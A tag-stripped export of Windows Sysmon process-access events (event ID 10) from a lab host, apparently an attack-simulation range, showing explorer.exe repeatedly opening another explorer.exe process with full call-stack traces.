22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 